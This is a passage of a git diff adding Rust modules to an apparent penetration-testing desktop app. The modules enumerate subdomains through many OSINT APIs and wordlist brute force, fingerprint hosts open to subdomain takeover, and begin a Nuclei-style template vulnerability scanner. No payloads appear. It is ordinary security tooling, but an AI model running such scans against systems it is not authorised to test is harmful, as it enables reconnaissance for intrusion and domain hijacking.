+async fn src_securitytrails(client: &reqwest::Client, domain: &str, key: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://api.securitytrails.com/v1/domain/{}/subdomains?children_only=false", domain);
+    let val = fetch_json_with_headers(client, &url, &[("APIKEY", key)]).await?;
+    let mut set = HashSet::new();
+    for s in values_from_array(&val, "subdomains") {
+        if let Some(sub) = s.as_str() {
+            let full = format!("{}.{}", sub, domain);
+            if let Some(h) = norm_host(&full, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_chaos(client: &reqwest::Client, domain: &str, key: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://dns.projectdiscovery.io/dns/{}/subdomains", domain);
+    let val = fetch_json_with_headers(client, &url, &[("Authorization", key)]).await?;
+    let mut set = HashSet::new();
+    for s in values_from_array(&val, "subdomains") {
+        if let Some(sub) = s.as_str() {
+            let full = format!("{}.{}", sub, domain);
+            if let Some(h) = norm_host(&full, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_shodan(client: &reqwest::Client, domain: &str, key: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://api.shodan.io/dns/domain/{}?key={}", domain, key);
+    let val = fetch_json(client, &url).await?;
+    let mut set = HashSet::new();
+    for s in values_from_array(&val, "subdomains") {
+        if let Some(sub) = s.as_str() {
+            let full = format!("{}.{}", sub, domain);
+            if let Some(h) = norm_host(&full, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_binaryedge(client: &reqwest::Client, domain: &str, key: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://api.binaryedge.io/v2/query/domains/subdomain/{}", domain);
+    let val = fetch_json_with_headers(client, &url, &[("X-Key", key)]).await?;
+    let mut set = HashSet::new();
+    for s in values_from_array(&val, "events") {
+        if let Some(host) = s.as_str() {
+            if let Some(h) = norm_host(host, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+async fn src_fullhunt(client: &reqwest::Client, domain: &str, key: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://fullhunt.io/api/v1/domain/{}/subdomains", domain);
+    let val = fetch_json_with_headers(client, &url, &[("X-API-KEY", key)]).await?;
+    let mut set = HashSet::new();
+    for s in values_from_array(&val, "hosts") {
+        if let Some(host) = s.as_str() {
+            if let Some(h) = norm_host(host, domain) { set.insert(h); }
+        }
+    }
+    Ok(set)
+}
+
+// ------------------------------------------------------------------
+// orchestrator
+// ------------------------------------------------------------------
+
+const FREE_SOURCES: &[&str] = &[
+    "crtsh", "certspotter", "hackertarget", "alienvault", "anubis",
+    "rapiddns", "wayback", "urlscan", "threatcrowd",
+];
+
+const KEY_SOURCES: &[&str] = &[
+    "c99", "virustotal", "securitytrails", "chaos", "shodan", "binaryedge", "fullhunt",
+];
+
+#[tauri::command]
+pub fn subdomain_sources() -> serde_json::Value {
+    serde_json::json!({
+        "free": FREE_SOURCES,
+        "key_based": KEY_SOURCES,
+    })
+}
+
+async fn fetch_source(
+    name: &str,
+    client: &reqwest::Client,
+    domain: &str,
+    keys: &HashMap<String, String>,
+) -> anyhow::Result<HashSet<String>> {
+    match name {
+        "crtsh"          => src_crtsh(client, domain).await,
+        "certspotter"    => src_certspotter(client, domain).await,
+        "hackertarget"   => src_hackertarget(client, domain).await,
+        "alienvault"     => src_alienvault(client, domain).await,
+        "anubis"         => src_anubis(client, domain).await,
+        "rapiddns"       => src_rapiddns(client, domain).await,
+        "wayback"        => src_wayback(client, domain).await,
+        "urlscan"        => src_urlscan(client, domain).await,
+        "threatcrowd"    => src_threatcrowd(client, domain).await,
+        "c99"            => src_c99(client, domain, keys.get("c99").ok_or_else(|| anyhow::anyhow!("missing c99 api key"))?).await,
+        "virustotal"     => src_virustotal(client, domain, keys.get("virustotal").ok_or_else(|| anyhow::anyhow!("missing virustotal api key"))?).await,
+        "securitytrails" => src_securitytrails(client, domain, keys.get("securitytrails").ok_or_else(|| anyhow::anyhow!("missing securitytrails api key"))?).await,
+        "chaos"          => src_chaos(client, domain, keys.get("chaos").ok_or_else(|| anyhow::anyhow!("missing chaos api key"))?).await,
+        "shodan"         => src_shodan(client, domain, keys.get("shodan").ok_or_else(|| anyhow::anyhow!("missing shodan api key"))?).await,
+        "binaryedge"     => src_binaryedge(client, domain, keys.get("binaryedge").ok_or_else(|| anyhow::anyhow!("missing binaryedge api key"))?).await,
+        "fullhunt"       => src_fullhunt(client, domain, keys.get("fullhunt").ok_or_else(|| anyhow::anyhow!("missing fullhunt api key"))?).await,
+        _ => Err(anyhow::anyhow!("unknown source: {name}")),
+    }
+}
+
+fn resolver() -> TokioAsyncResolver {
+    let mut opts = ResolverOpts::default();
+    opts.timeout = Duration::from_secs(3);
+    opts.attempts = 1;
+    TokioAsyncResolver::tokio(ResolverConfig::cloudflare(), opts)
+}
+
+#[tauri::command]
+pub async fn subdomain_enum(
+    app: AppHandle,
+    req: SubdomainRequest,
+) -> Result<Vec<SubdomainHit>, String> {
+    let client = build_client();
+    let resolver = Arc::new(resolver());
+    let keys = req.api_keys.clone().unwrap_or_default();
+
+    let enabled: Vec<String> = req.sources.clone()
+        .filter(|v| !v.is_empty())
+        .unwrap_or_else(|| FREE_SOURCES.iter().map(|s| s.to_string()).collect());
+
+    let _ = app.emit("subenum:status", format!("running {} source(s) in parallel", enabled.len()));
+
+    // ---- run all sources concurrently ----
+    let mut all: HashMap<String, String> = HashMap::new(); // host → first-seen source
+    let stats: Arc<tokio::sync::Mutex<Vec<SourceStat>>> = Arc::new(tokio::sync::Mutex::new(Vec::new()));
+
+    let source_results = futures::future::join_all(enabled.iter().map(|name| {
+        let client = client.clone();
+        let keys = keys.clone();
+        let domain = req.domain.clone();
+        let app = app.clone();
+        let stats = stats.clone();
+        let name = name.clone();
+        async move {
+            let started = std::time::Instant::now();
+            let res = fetch_source(&name, &client, &domain, &keys).await;
+            let took = started.elapsed().as_millis();
+            match res {
+                Ok(set) => {
+                    let stat = SourceStat { source: name.clone(), count: set.len(), error: None, took_ms: took };
+                    let _ = app.emit("subenum:source", stat.clone());
+                    stats.lock().await.push(stat);
+                    (name, set)
+                }
+                Err(e) => {
+                    let stat = SourceStat { source: name.clone(), count: 0, error: Some(e.to_string()), took_ms: took };
+                    let _ = app.emit("subenum:source", stat.clone());
+                    stats.lock().await.push(stat);
+                    (name, HashSet::new())
+                }
+            }
+        }
+    })).await;
+
+    for (src_name, set) in source_results {
+        for h in set {
+            all.entry(h).or_insert(src_name.clone());
+        }
+    }
+
+    // ---- bruteforce additions ----
+    if let Some(words) = &req.wordlist {
+        for w in words {
+            let host = format!("{}.{}", w.trim(), req.domain);
+            all.entry(host).or_insert("brute".into());
+        }
+    }
+
+    let total = all.len();
+    let _ = app.emit("subenum:status", format!("aggregated {total} candidates — resolving"));
+
+    // ---- DNS resolve all candidates concurrently ----
+    let sem = Arc::new(Semaphore::new(req.concurrency.max(1)));
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+
+    let hits: Vec<SubdomainHit> = stream::iter(all.into_iter())
+        .map(|(host, source)| {
+            let resolver = resolver.clone();
+            let sem = sem.clone();
+            let done = done.clone();
+            let app = app.clone();
+            async move {
+                let _permit = sem.acquire().await.unwrap();
+                let result = resolver.lookup_ip(host.as_str()).await;
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("subenum:progress", serde_json::json!({"done": n, "total": total}));
+                match result {
+                    Ok(lookup) => {
+                        let ips: Vec<String> = lookup.iter().map(|ip| ip.to_string()).collect();
+                        if ips.is_empty() { None } else {
+                            let hit = SubdomainHit { host, source, ips };
+                            let _ = app.emit("subenum:hit", hit.clone());
+                            Some(hit)
+                        }
+                    }
+                    Err(_) => None,
+                }
+            }
+        })
+        .buffer_unordered(req.concurrency.max(1))
+        .filter_map(|x| async move { x })
+        .collect()
+        .await;
+
+    let _ = app.emit("subenum:done", hits.len());
+    Ok(hits)
+}
diff --git a/src-tauri/src/modules/takeover.rs b/src-tauri/src/modules/takeover.rs
new file mode 100644
index 0000000..18b2408
--- /dev/null
+++ b/src-tauri/src/modules/takeover.rs
@@ -0,0 +1,312 @@
+use std::sync::Arc;
+use std::time::Duration;
+
+use futures::stream::{self, StreamExt};
+use hickory_resolver::config::{ResolverConfig, ResolverOpts};
+use hickory_resolver::TokioAsyncResolver;
+use once_cell::sync::Lazy;
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::sync::Semaphore;
+
+#[derive(Debug, Clone)]
+pub struct Fingerprint {
+    pub service: &'static str,
+    pub cname_patterns: &'static [&'static str],
+    pub body_match: &'static [&'static str],
+    pub http_status: Option<u16>,
+    pub vulnerable: bool,
+    pub confidence: &'static str,
+}
+
+static FINGERPRINTS: Lazy<Vec<Fingerprint>> = Lazy::new(|| {
+    vec![
+        Fingerprint {
+            service: "AWS/S3",
+            cname_patterns: &["s3.amazonaws.com", "s3-website"],
+            body_match: &["NoSuchBucket", "The specified bucket does not exist"],
+            http_status: Some(404),
+            vulnerable: true,
+            confidence: "HIGH",
+        },
+        Fingerprint {
+            service: "GitHub Pages",
+            cname_patterns: &["github.io", "github.map.fastly.net"],
+            body_match: &["There isn't a GitHub Pages site here", "For root URLs"],
+            http_status: Some(404),
+            vulnerable: true,
+            confidence: "HIGH",
+        },
+        Fingerprint {
+            service: "Heroku",
+            cname_patterns: &["herokuapp.com", "herokussl.com"],
+            body_match: &["no-such-app", "No such app"],
+            http_status: Some(404),
+            vulnerable: true,
+            confidence: "HIGH",
+        },
+        Fingerprint {
+            service: "Shopify",
+            cname_patterns: &["myshopify.com"],
+            body_match: &["Sorry, this shop is currently unavailable"],
+            http_status: None,
+            vulnerable: true,
+            confidence: "MEDIUM",
+        },
+        Fingerprint {
+            service: "Azure",
+            cname_patterns: &[
+                "azurewebsites.net", "cloudapp.net", "cloudapp.azure.com",
+                "trafficmanager.net", "blob.core.windows.net", "azureedge.net",
+                "azure-api.net", "azurecontainer.io",
+            ],
+            body_match: &["404 Web Site not found", "Error 404 - Web app not found"],
+            http_status: Some(404),
+            vulnerable: true,
+            confidence: "HIGH",
+        },
+        Fingerprint {
+            service: "Fastly",
+            cname_patterns: &["fastly.net"],
+            body_match: &["Fastly error: unknown domain"],
+            http_status: None,
+            vulnerable: true,
+            confidence: "MEDIUM",
+        },
+        Fingerprint {
+            service: "Readme.io",
+            cname_patterns: &["readme.io"],
+            body_match: &["Project doesnt exist... yet!"],
+            http_status: None,
+            vulnerable: true,
+            confidence: "HIGH",
+        },
+        Fingerprint {
+            service: "Tumblr",
+            cname_patterns: &["domains.tumblr.com"],
+            body_match: &["Whatever you were looking for doesn't currently exist"],
+            http_status: None,
+            vulnerable: true,
+            confidence: "HIGH",
+        },
+        Fingerprint {
+            service: "Unbounce",
+            cname_patterns: &["unbouncepages.com"],
+            body_match: &["The requested URL was not found on this server"],
+            http_status: None,
+            vulnerable: true,
+            confidence: "MEDIUM",
+        },
+        Fingerprint {
+            service: "Ghost",
+            cname_patterns: &["ghost.io"],
+            body_match: &["The thing you were looking for is no longer here"],
+            http_status: None,
+            vulnerable: true,
+            confidence: "HIGH",
+        },
+        Fingerprint {
+            service: "Pantheon",
+            cname_patterns: &["pantheonsite.io"],
+            body_match: &["The gods are wise, but do not know of the site which you seek"],
+            http_status: None,
+            vulnerable: true,
+            confidence: "HIGH",
+        },
+        Fingerprint {
+            service: "Zendesk",
+            cname_patterns: &["zendesk.com"],
+            body_match: &["Help Center Closed"],
+            http_status: None,
+            vulnerable: true,
+            confidence: "LOW",
+        },
+        Fingerprint {
+            service: "Surge.sh",
+            cname_patterns: &["surge.sh"],
+            body_match: &["project not found"],
+            http_status: None,
+            vulnerable: true,
+            confidence: "HIGH",
+        },
+        Fingerprint {
+            service: "Bitbucket",
+            cname_patterns: &["bitbucket.io"],
+            body_match: &["Repository not found"],
+            http_status: None,
+            vulnerable: true,
+            confidence: "HIGH",
+        },
+        Fingerprint {
+            service: "Netlify",
+            cname_patterns: &["netlify.app", "netlify.com"],
+            body_match: &["Not Found - Request ID"],
+            http_status: Some(404),
+            vulnerable: true,
+            confidence: "MEDIUM",
+        },
+        Fingerprint {
+            service: "Vercel",
+            cname_patterns: &["vercel.app", "now.sh"],
+            body_match: &["The deployment could not be found"],
+            http_status: Some(404),
+            vulnerable: true,
+            confidence: "MEDIUM",
+        },
+        Fingerprint {
+            service: "Cargo",
+            cname_patterns: &["cargocollective.com"],
+            body_match: &["404 Not Found"],
+            http_status: None,
+            vulnerable: true,
+            confidence: "LOW",
+        },
+        Fingerprint {
+            service: "Statuspage",
+            cname_patterns: &["statuspage.io"],
+            body_match: &["You are being redirected"],
+            http_status: None,
+            vulnerable: false,
+            confidence: "LOW",
+        },
+    ]
+});
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct TakeoverRequest {
+    pub hosts: Vec<String>,
+    pub concurrency: usize,
+    pub timeout_ms: u64,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct TakeoverFinding {
+    pub host: String,
+    pub cname: Option<String>,
+    pub service: Option<String>,
+    pub vulnerable: bool,
+    pub confidence: String,
+    pub evidence: String,
+    pub http_status: Option<u16>,
+}
+
+async fn check_host(
+    host: &str,
+    resolver: &TokioAsyncResolver,
+    client: &reqwest::Client,
+) -> Option<TakeoverFinding> {
+    // 1. lookup CNAME
+    let cname = resolver
+        .lookup(host.to_string(), hickory_resolver::proto::rr::RecordType::CNAME)
+        .await
+        .ok()
+        .and_then(|lookup| lookup.iter().next().map(|r| r.to_string().trim_end_matches('.').to_string()));
+
+    let cname = cname?;
+
+    // 2. match CNAME against fingerprint DB
+    let fp = FINGERPRINTS.iter().find(|f| {
+        f.cname_patterns
+            .iter()
+            .any(|p| cname.to_lowercase().contains(&p.to_lowercase()))
+    })?;
+
+    // 3. probe HTTP for confirmation
+    let urls = [format!("https://{host}"), format!("http://{host}")];
+    let mut http_status: Option<u16> = None;
+    let mut body = String::new();
+
+    for u in &urls {
+        if let Ok(resp) = client.get(u).send().await {
+            http_status = Some(resp.status().as_u16());
+            body = resp.text().await.unwrap_or_default();
+            if !body.is_empty() {
+                break;
+            }
+        }
+    }
+
+    let mut matched = false;
+    let mut evidence = String::new();
+    for pat in fp.body_match {
+        if body.to_lowercase().contains(&pat.to_lowercase()) {
+            matched = true;
+            evidence = format!("body contains: \"{pat}\"");
+            break;
+        }
+    }
+
+    if !matched {
+        if let (Some(expected), Some(actual)) = (fp.http_status, http_status) {
+            if expected == actual {
+                evidence = format!("cname match + status {actual} (body signature missing — likely reclaimed)");
+                matched = true;
+            }
+        }
+    }
+
+    // always report cname-fingerprinted hosts; vulnerability flag based on body confirm
+    Some(TakeoverFinding {
+        host: host.to_string(),
+        cname: Some(cname),
+        service: Some(fp.service.to_string()),
+        vulnerable: matched && fp.vulnerable,
+        confidence: if matched { fp.confidence.to_string() } else { "INFO".into() },
+        evidence: if evidence.is_empty() {
+            format!("cname points to {} (no takeover indicators)", fp.service)
+        } else {
+            evidence
+        },
+        http_status,
+    })
+}
+
+#[tauri::command]
+pub async fn takeover_scan(
+    app: AppHandle,
+    req: TakeoverRequest,
+) -> Result<Vec<TakeoverFinding>, String> {
+    let mut opts = ResolverOpts::default();
+    opts.timeout = Duration::from_secs(3);
+    let resolver = Arc::new(TokioAsyncResolver::tokio(ResolverConfig::cloudflare(), opts));
+
+    let client = Arc::new(
+        reqwest::Client::builder()
+            .danger_accept_invalid_certs(true)
+            .timeout(Duration::from_millis(req.timeout_ms))
+            .redirect(reqwest::redirect::Policy::none())
+            .user_agent("Mozilla/5.0 (PocketPentester)")
+            .build()
+            .map_err(|e| e.to_string())?,
+    );
+
+    let total = req.hosts.len();
+    let sem = Arc::new(Semaphore::new(req.concurrency.max(1)));
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+
+    let findings: Vec<TakeoverFinding> = stream::iter(req.hosts.into_iter())
+        .map(|host| {
+            let resolver = resolver.clone();
+            let client = client.clone();
+            let sem = sem.clone();
+            let done = done.clone();
+            let app = app.clone();
+            async move {
+                let _permit = sem.acquire().await.unwrap();
+                let res = check_host(&host, &resolver, &client).await;
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("takeover:progress", serde_json::json!({"done": n, "total": total}));
+                if let Some(ref f) = res {
+                    let _ = app.emit("takeover:hit", f.clone());
+                }
+                res
+            }
+        })
+        .buffer_unordered(req.concurrency.max(1))
+        .filter_map(|x| async move { x })
+        .collect()
+        .await;
+
+    let _ = app.emit("takeover:done", findings.len());
+    Ok(findings)
+}
diff --git a/src-tauri/src/modules/xploiter.rs b/src-tauri/src/modules/xploiter.rs
new file mode 100644
index 0000000..63756e7
--- /dev/null
+++ b/src-tauri/src/modules/xploiter.rs
@@ -0,0 +1,645 @@
+// ===================================================================
+// Xploiter — pure-Rust template-driven vulnerability scanner
+// Author: imtaqin / PocketPentester
+//
+// Template format (YAML) — compatible with most Nuclei patterns plus
+// our own extensions. Covers: RCE, SQLi patterns, LFI, SSRF, open
+// redirect, info-exposure, CVE chains, and user-authored templates.
+//
+// TODO(backend): community template registry with signed/curated
+//                sharing is planned as a subscription-gated cloud
+//                service. For now, templates are local-only.
+// TODO(backend): OOB interaction server (interact.sh-lite) for blind
+//                RCE/SSRF/XXE detection. To be shipped with cloud tier.
+// ===================================================================
+
+use std::collections::HashMap;
+use std::sync::Arc;
+use std::time::{Duration, Instant};
+
+use futures::stream::{self, StreamExt};
+use rand::Rng;
+use regex::Regex;
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::sync::Semaphore;
+
+// ------------------------------------------------------------------
+// Template schema
+// ------------------------------------------------------------------
+
+#[allow(dead_code)]
+#[derive(Debug, Clone, Deserialize)]
+pub struct Template {
+    pub id: String,
+    pub info: TemplateInfo,
+
+    #[serde(default)]
+    pub variables: HashMap<String, String>,
+
+    /// Global payload sets shared across requests (referenced by name).
+    #[serde(default)]
+    pub payloads: HashMap<String, Vec<String>>,
+
+    /// Sequential HTTP requests. Extractors in step N populate variables
+    /// available to step N+1 (basic workflow chaining).
+    #[serde(default)]
+    pub http: Vec<HttpRequest>,
+
+    /// Alias for `http` (Nuclei compatibility).
+    #[serde(default)]
+    pub requests: Vec<HttpRequest>,
+}
+
+#[allow(dead_code)]
+#[derive(Debug, Clone, Deserialize, Serialize)]
+pub struct TemplateInfo {
+    pub name: String,
+    #[serde(default)]
+    pub author: String,
+    #[serde(default = "default_sev")]
+    pub severity: String,
+    #[serde(default)]
+    pub description: String,
+    #[serde(default)]
+    pub tags: Vec<String>,
+    #[serde(default)]
+    pub reference: Vec<String>,
+    #[serde(default)]
+    pub classification: Option<Classification>,
+    #[serde(default)]
+    pub remediation: Option<String>,
+}
+
+#[allow(dead_code)]
+#[derive(Debug, Clone, Deserialize, Serialize)]
+pub struct Classification {
+    #[serde(default)]
+    pub cvss_score: Option<f32>,
+    #[serde(default)]
+    pub cve_id: Option<String>,
+    #[serde(default)]
+    pub cwe_id: Option<Vec<String>>,
+}
+
+fn default_sev() -> String { "info".into() }
+
+#[allow(dead_code)]
+#[derive(Debug, Clone, Deserialize)]
+pub struct HttpRequest {
+    #[serde(default = "default_method")]
+    pub method: String,
+
+    /// Path list — each path is templated. Each entry spawns one sub-request
+    /// (unless payload-substitution expands it further).
+    pub path: Vec<String>,
+
+    #[serde(default)]
+    pub headers: HashMap<String, String>,
+
+    #[serde(default)]
+    pub body: Option<String>,
+
+    /// Request-local variables (merged with template-global + extracted).
+    #[serde(default)]
+    pub variables: HashMap<String, String>,
+
+    /// Payload injection: each key is a `{{placeholder}}` replaced by each
+    /// value from the list (cartesian unless `attack: pitchfork|clusterbomb`).
+    #[serde(default)]
+    pub payloads: HashMap<String, Vec<String>>,
+
+    #[serde(default = "default_attack")]
+    pub attack: String, // "batteringram" (single list) or "clusterbomb"
+
+    #[serde(default = "default_match_cond")]
+    pub matchers_condition: String,
+
+    #[serde(default)]
+    pub matchers: Vec<Matcher>,
+
+    #[serde(default)]
+    pub extractors: Vec<Extractor>,
+
+    #[serde(default)]
+    pub stop_at_first_match: bool,
+
+    #[serde(default = "default_true")]
+    pub redirects: bool,
+
+    /// Raw HTTP for smuggling / control-char testing (optional).
+    #[serde(default)]
+    pub raw: Option<String>,
+}
+
+fn default_method() -> String { "GET".into() }
+fn default_match_cond() -> String { "or".into() }
+fn default_attack() -> String { "batteringram".into() }
+fn default_true() -> bool { true }
+
+#[allow(dead_code)]
+#[derive(Debug, Clone, Deserialize)]
+pub struct Matcher {
+    #[serde(rename = "type")]
+    pub kind: String, // word | regex | status | size | dsl | binary
+    #[serde(default)]
+    pub part: Option<String>, // body | header | all | interactsh_protocol
+    #[serde(default)]
+    pub words: Option<Vec<String>>,
+    #[serde(default)]
+    pub regex: Option<Vec<String>>,
+    #[serde(default)]
+    pub status: Option<Vec<u16>>,
+    #[serde(default)]
+    pub size: Option<Vec<u64>>,
+    #[serde(default)]
+    pub binary: Option<Vec<String>>, // hex
+    #[serde(default)]
+    pub dsl: Option<Vec<String>>, // simple DSL: see eval_dsl
+    #[serde(default = "default_match_cond")]
+    pub condition: String,
+    #[serde(default)]
+    pub negative: bool,
+    #[serde(default)]
+    pub name: Option<String>,
+}
+
+#[allow(dead_code)]
+#[derive(Debug, Clone, Deserialize)]
+pub struct Extractor {
+    #[serde(rename = "type")]
+    pub kind: String, // regex | kval | json
+    #[serde(default)]
+    pub part: Option<String>,
+    #[serde(default)]
+    pub regex: Option<Vec<String>>,
+    #[serde(default)]
+    pub kval: Option<Vec<String>>, // header/cookie keys
+    #[serde(default)]
+    pub json: Option<Vec<String>>, // dotted path e.g. "token.access"
+    #[serde(default)]
+    pub group: Option<usize>,
+    #[serde(default)]
+    pub name: Option<String>,
+    /// If set, extracted values become template variables for next requests.
+    #[serde(default)]
+    pub internal: bool,
+}
+
+// ------------------------------------------------------------------
+// Runtime
+// ------------------------------------------------------------------
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct RunRequest {
+    pub targets: Vec<String>,
+    pub templates_yaml: Vec<String>,
+    pub concurrency: usize,
+    pub timeout_ms: u64,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct Finding {
+    pub template_id: String,
+    pub template_name: String,
+    pub severity: String,
+    pub tags: Vec<String>,
+    pub target: String,
+    pub matched_url: String,
+    pub status: u16,
+    pub matcher_names: Vec<String>,
+    pub extracted: HashMap<String, Vec<String>>,
+    pub description: String,
+    pub remediation: Option<String>,
+    pub reference: Vec<String>,
+    pub cvss: Option<f32>,
+    pub cve_id: Option<String>,
+}
+
+// helpers ----------------------------------------------------------
+
+fn randstr(n: usize) -> String {
+    let chars: Vec<char> = "abcdefghijklmnopqrstuvwxyz0123456789".chars().collect();
+    let mut rng = rand::thread_rng();
+    (0..n).map(|_| chars[rng.gen_range(0..chars.len())]).collect()
+}
+
+fn now_unix() -> u64 {
+    std::time::SystemTime::now()
+        .duration_since(std::time::UNIX_EPOCH)
+        .map(|d| d.as_secs())
+        .unwrap_or(0)
+}
+
+/// Expand `{{var}}` and helper placeholders inside a template string.
+fn expand(s: &str, vars: &HashMap<String, String>) -> String {
+    let mut out = s.to_string();
+    // helpers
+    out = out.replace("{{randstr}}", &randstr(10));
+    out = out.replace("{{rand_int}}", &rand::thread_rng().gen_range(1000..9999).to_string());
+    out = out.replace("{{unix_time}}", &now_unix().to_string());
+    // user variables
+    for (k, v) in vars {
+        out = out.replace(&format!("{{{{{k}}}}}"), v);
+    }
+    out
+}
+
+fn part_of(part: &str, status: u16, headers: &reqwest::header::HeaderMap, body: &str) -> String {
+    match part {
+        "header" | "headers" => headers
+            .iter()
+            .map(|(k, v)| format!("{}: {}", k, v.to_str().unwrap_or("")))
+            .collect::<Vec<_>>()
+            .join("\n"),
+        "body" | "" => body.to_string(),
+        "all" => format!(
+            "HTTP/1.1 {}\n{}\n\n{}",
+            status,
+            headers.iter().map(|(k, v)| format!("{}: {}", k, v.to_str().unwrap_or(""))).collect::<Vec<_>>().join("\n"),
+            body
+        ),
+        _ => body.to_string(),
+    }
+}
+
+fn check_matcher(m: &Matcher, status: u16, headers: &reqwest::header::HeaderMap, body: &str, duration_ms: u128) -> bool {
+    let part = m.part.as_deref().unwrap_or("body");
+    let haystack = part_of(part, status, headers, body);
+
+    let result = match m.kind.as_str() {
+        "status" => m.status.as_ref().is_some_and(|s| s.contains(&status)),
+        "word" => {
+            if let Some(words) = &m.words {
+                if m.condition == "and" {
+                    words.iter().all(|w| haystack.contains(w))
+                } else {
+                    words.iter().any(|w| haystack.contains(w))
+                }
+            } else { false }
+        }
+        "regex" => {
+            if let Some(patterns) = &m.regex {
+                let regs: Vec<Regex> = patterns.iter().filter_map(|p| Regex::new(p).ok()).collect();
+                if m.condition == "and" {
+                    regs.iter().all(|re| re.is_match(&haystack))
+                } else {
+                    regs.iter().any(|re| re.is_match(&haystack))
+                }
+            } else { false }
+        }
+        "size" => m.size.as_ref().is_some_and(|s| s.contains(&(body.len() as u64))),
+        "binary" => {
+            // hex bytes match anywhere in body
+            if let Some(patterns) = &m.binary {
+                patterns.iter().any(|hex| {
+                    let bytes: Vec<u8> = (0..hex.len())
+                        .step_by(2)
+                        .filter_map(|i| u8::from_str_radix(hex.get(i..i + 2).unwrap_or("00"), 16).ok())
+                        .collect();
+                    body.as_bytes().windows(bytes.len()).any(|w| w == bytes.as_slice())
+                })
+            } else { false }
+        }
+        "dsl" => {
+            // minimal DSL: `duration > 5000`, `status == 200`, `contains(body, "foo")`
+            if let Some(exprs) = &m.dsl {
+                let ok = |e: &str| eval_dsl(e, status, body, duration_ms);
+                if m.condition == "and" { exprs.iter().all(|e| ok(e)) }
+                else { exprs.iter().any(|e| ok(e)) }
+            } else { false }
+        }
+        _ => false,
+    };
+    if m.negative { !result } else { result }
+}
+
+fn eval_dsl(expr: &str, status: u16, body: &str, duration_ms: u128) -> bool {
+    // SUPER minimal DSL — extend as needed. Supports:
+    //   status == N | status != N | status >= N | status <= N
+    //   duration > N | duration < N  (milliseconds)
+    //   size > N | size < N
+    //   contains(body, "text")
+    //   regex(body, "pat")
+    let e = expr.trim();
+
+    if let Some(rest) = e.strip_prefix("contains(body,") {
+        let t = rest.trim_end_matches(')').trim().trim_matches('"');
+        return body.contains(t);
+    }
+    if let Some(rest) = e.strip_prefix("regex(body,") {
+        let t = rest.trim_end_matches(')').trim().trim_matches('"');
+        return Regex::new(t).map(|re| re.is_match(body)).unwrap_or(false);
+    }
+
+    let parse_binop = |lhs: &str, input: &str| -> Option<(u128, &'static str, u128)> {
+        let cleaned = input.trim();
+        let rest = cleaned.strip_prefix(lhs)?.trim_start();
+        for op in [">=", "<=", "==", "!=", ">", "<"] {
+            if let Some(r) = rest.strip_prefix(op) {
+                if let Ok(n) = r.trim().parse::<u128>() {
+                    let lhs_val = match lhs {
+                        "status" => status as u128,
+                        "duration" => duration_ms,
+                        "size" => body.len() as u128,
+                        _ => return None,
+                    };
+                    let op_tag: &'static str = match op {
+                        ">=" => ">=", "<=" => "<=", "==" => "==",
+                        "!=" => "!=", ">" => ">", "<" => "<", _ => "==",
+                    };
+                    return Some((lhs_val, op_tag, n));
+                }
+            }
+        }
+        None
+    };
+
+    for lhs in ["status", "duration", "size"] {
+        if let Some((a, op, b)) = parse_binop(lhs, e) {
+            return match op {
+                "==" => a == b, "!=" => a != b,
+                ">" => a > b, "<" => a < b,
+                ">=" => a >= b, "<=" => a <= b,
+                _ => false,
+            };
+        }
+    }
+    false
+}
+
+fn run_extractors(extractors: &[Extractor], status: u16, headers: &reqwest::header::HeaderMap, body: &str)
+    -> HashMap<String, Vec<String>>
+{
+    let mut out: HashMap<String, Vec<String>> = HashMap::new();
+    for ex in extractors {
+        let part = ex.part.as_deref().unwrap_or("body");
+        let name = ex.name.clone().unwrap_or_else(|| "extracted".into());
+        match ex.kind.as_str() {
+            "regex" => {
+                let Some(patterns) = &ex.regex else { continue };
+                let haystack = part_of(part, status, headers, body);
+                let group = ex.group.unwrap_or(0);
+                for p in patterns {
+                    if let Ok(re) = Regex::new(p) {
+                        for cap in re.captures_iter(&haystack) {
+                            if let Some(m) = cap.get(group) {
+                                out.entry(name.clone()).or_default().push(m.as_str().to_string());
+                            }
+                        }
+                    }
+                }
+            }
+            "kval" => {
+                let Some(keys) = &ex.kval else { continue };
+                for k in keys {
+                    if let Some(v) = headers.get(k).and_then(|v| v.to_str().ok()) {
+                        out.entry(k.clone()).or_default().push(v.to_string());
+                    }
+                }
+            }
+            "json" => {
+                let Some(paths) = &ex.json else { continue };
+                if let Ok(val) = serde_json::from_str::<serde_json::Value>(body) {
+                    for p in paths {
+                        if let Some(v) = json_lookup(&val, p) {
+                            out.entry(p.clone()).or_default().push(
+                                v.as_str().map(String::from).unwrap_or_else(|| v.to_string())
+                            );
+                        }
+                    }
+                }
+            }
+            _ => {}
+        }
+    }
+    out
+}
+
+fn json_lookup<'a>(val: &'a serde_json::Value, path: &str) -> Option<&'a serde_json::Value> {
+    let mut cur = val;
+    for part in path.split('.') {
+        cur = cur.get(part)?;
+    }
+    Some(cur)
+}
+
+fn expand_payloads(path: &str, payloads: &HashMap<String, Vec<String>>, attack: &str) -> Vec<HashMap<String, String>> {
+    // returns list of var-substitution maps — one per payload combination
+    let used: Vec<(&String, &Vec<String>)> = payloads.iter()
+        .filter(|(k, _)| path.contains(&format!("{{{{{k}}}}}")))
+        .collect();
+    if used.is_empty() { return vec![HashMap::new()]; }
+
+    match attack {
+        "batteringram" => {
+            // single-list: all placeholders get same index value
+            if let Some(max) = used.iter().map(|(_, v)| v.len()).max() {
